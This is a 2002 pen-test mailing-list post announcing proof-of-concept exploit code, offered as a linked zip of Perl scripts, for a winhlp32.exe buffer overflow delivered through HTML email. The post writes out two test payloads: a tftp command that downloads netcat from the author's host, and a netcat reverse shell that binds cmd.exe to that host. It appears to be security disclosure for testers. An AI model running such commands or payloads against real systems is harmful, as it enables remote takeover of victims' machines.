From garyo@sec-1.com Thu Aug 15 00:48:20 2002 From: Gary O'leary-Steele To: pen-test@securityfocus.com Date: Mon, 12 Aug 2002 16:22:10 +0100 Subject: winhlp32.exe buffer overflow exploit code. [The following text is in the "iso-8859-1" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] Hello all, For some reason my previous posts did not make it onto security focus ?-) The following is a link to proof of concept code /exploit code for this overflow. The shell code is relatively small but effective if used correctly. The perl script takes a command to execute (WinExec,SW_HIDE) and a html output file. There are two versions included in the zip. Http://www.sec-1.com/help.zip HelpMe.pl // Was written to work with my machine Kernel32.dll version 5.0.2195.4272 (Rare ?) HelpMe2.pl // Was written to work with all other machines I tested. kernel32.dll version 5.0.2195.2778 I have tested the exploit using two html emails. email 1 Executes tftp.exe -i my.ip.address get nc.exe c:\winnt\system32\nc.exe email 2 Executes nc.exe my.ip.address 80 -e cmd.exe If the exploit executes correctly exitprocess()is called so no error occurs. Kind Regards Gary O'leary-Steele XScan Team www.Sec-1.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/